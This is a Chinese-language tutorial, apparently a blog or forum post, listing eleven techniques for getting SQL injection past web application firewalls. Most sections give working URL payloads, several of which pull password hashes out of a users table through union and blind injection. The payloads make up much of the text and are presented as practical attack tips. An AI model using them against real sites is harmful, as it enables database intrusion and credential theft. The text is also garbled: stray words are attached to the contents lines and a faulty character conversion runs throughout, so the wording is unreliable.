做者:bystander
博客:http://leaver.me
論壇:法克論壇php
目錄正則表達式
1.大小寫繞過sql
2.簡單編碼繞過服務器
3.註釋繞過markdown
4.分隔重寫繞過函數
5.Http參數污染(HPP)post
6.使用邏輯運算符 or /and繞過學習
7.比較操做符替換測試
8.同功能函數替換ui
9.盲注無需or和and
10.加括號
11.緩衝區溢出繞過
1. 大小寫繞過
這個你們都很熟悉,對於一些太垃圾的WAF效果顯著,好比攔截了union,那就使用Union UnIoN等等。繞過
2. 簡單編碼繞過
好比WAF檢測關鍵字,那麼咱們讓他檢測不到就能夠了。好比檢測union,那麼咱們就用%55 也就是U的16進制編碼來代替U, union寫成 %55nION,結合大小寫也能夠繞過一些WAF,你能夠隨意替換一個或幾個均可以。。
也還有你們在Mysql注入中好比表名或是load文件的時候,會把文件名或是代表用16進制編碼來繞過WAF都是屬於這類。
3. 註釋繞過
這種狀況比較少,適用於WAF只是過濾了一次危險的語句,而沒有阻斷咱們的整個查詢
/?id=1+union+select+1,2,3/*
好比對於上面這條查詢,WAF過濾了一次union和select,那麼咱們在以前在寫一個註釋的語句,讓他把註釋裏面的過濾掉,,並不影響咱們的查詢。。
因此繞過語句就是:
/?id=1/ union/union/ select/select+1,2,3/*
還有一種和註釋有關的繞過:
好比
index.php?page_id=-15 / !UNION/ / !SELECT/ 1,2,3,4….
能夠看到,只要咱們把敏感詞放到註釋裏面,注意,前面要加一個!
4. 分隔重寫繞過
仍是上面的例子,適用於那種WAF採用了正則表達式的狀況,會檢測全部的敏感字,而不在意你寫在哪裏,有幾個就過濾幾個。。
咱們能夠經過註釋分開敏感字,這樣WAF的正則不起做用了,而帶入查詢的時候並不影響咱們的結果
/?id=1+un//ion+sel//ect+1,2,3–
至於重寫繞過,適用於WAF過濾了一次的狀況,和咱們上傳aaspsp馬的原理同樣,咱們能夠寫出相似Ununionion這樣的。過濾一次union後就會執行咱們的查詢了
?id=1 ununionion select 1,2,3–
5. Http參數污染(HPP)
好比咱們有這樣的語句:
/?id=1 union select+1,2,3+from+users+where+id=1–
咱們能夠重複一次前面的id值添加咱們的值來繞過,&id=會在查詢時變成逗號
/?id=1 union select+1&id=2,3+from+users+where+id=1–
這種狀況成功的條件比較多,取決於具體的WAF實現。。
再給出一個例子說明用法
/?id=1/*/union/&id=/select/&id=/pwd/&id=/from/&id=*/users–
具體分析的話就涉及到查詢語句的後臺代碼的編寫了。
好比服務器是這樣寫的:
select * from table where a=」.$_GET[‘a’].」 and b=」.$_GET[‘b’].」 limit 「.$_GET[‘c’];
那咱們能夠構造這樣的注入語句:
/?a=1+union/ &b=/select+1,pass/ &c=/from+users–
最終解析爲:
select from table where a=1 union/ and b= /select 1,pass/limit */from users–
能夠看到,這種方式其實比較適合白盒測試,而對於黑盒滲透的話,用起來比較麻煩。可是也能夠一試。
6. 使用邏輯運算符 or /and繞過
/?id=1+OR+0x50=0x50
/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
順便解釋一下第二句話,從最裏面的括號開始分析,select+pwd+from+users+limit+1,1 這句是從users表裏查詢pwd字段的第一條記錄,好比是admin,
而後mid(上一句),1,1就是取admin的第一個字符,也就是a,
lower(上一句)就是把字符轉換爲小寫,
而後ascii就是把a轉換成ascii碼,看等不等於74.
7. 比較操做符替換
包括!= 不等於,<>不等於,< 小於,>大於,這些均可以用來替換=來繞過,
好比上一個例子,要判斷是否是74,假設=被過濾,那麼咱們能夠判斷是否是大於73,是否是小於75,而後就知道是74了。。不少WAF都會忘了這個。
8. 同功能函數替換
Substring()能夠用mid(),substr()這些函數來替換,都是用來取字符串的某一位字符的。
Ascii()編碼能夠用hex(),bin(),也就是16進制和二進制編碼替換
Benchmark() 能夠用sleep()來替換,這兩個使用在基於延時的盲注中,有機會給你們介紹
若是連這些都屏蔽了,還有一種新的方法
substring((select ‘password’),1,1) = 0x70
substr((select ‘password’),1,1) = 0x70
mid((select ‘password’),1,1) = 0x70
好比這三條,都是從password裏判斷第一個字符的值,能夠用
strcmp(left(‘password’,1), 0x69) = 1
strcmp(left(‘password’,1), 0x70) = 0
strcmp(left(‘password’,1), 0x71) = -1
來替換,left用來取字符串左起1位的值,strcmp用來比較兩個值,若是比較結果相等就爲0,左邊小的話就爲-1,不然爲1
還有我前幾篇說過的group_concat 和concat和concat_ws也能夠互相替換
9. 盲注無需or和and
好比有這樣一個注入點:
index.php?uid=123
and or 被過濾了,其實有一種更直接的方法,咱們直接修改123爲咱們的語句生成的,
index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)+123
123的時候頁面是正確的,咱們如今在盲猜hash的第一位,若是第一位等於0x42也就是B,那麼strcmp結果爲0,0+123=123,因此頁面應該是正確的。不然就說明不是B,就這樣猜,不用and 和or了。。
10. 加括號
/?id=1+union+(select+1,2+from+users)
好比,上面這一條被WAF攔截了。能夠試試加一些括號
/?id=1+union+(select+1,2+from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select’1’,concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)
最後,我的能力畢竟有限,有些也一時想不起,想起來的話再補充。同時歡迎你們指正,補充。
11.緩衝區溢出繞過
剛剛寫着把這個給忘了。這個是從國外一個博客看到的。
id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36–+其中0xAAAAAAAAAAAAAAAAAAAAA這裏A越多越好。。通常要求1000個以上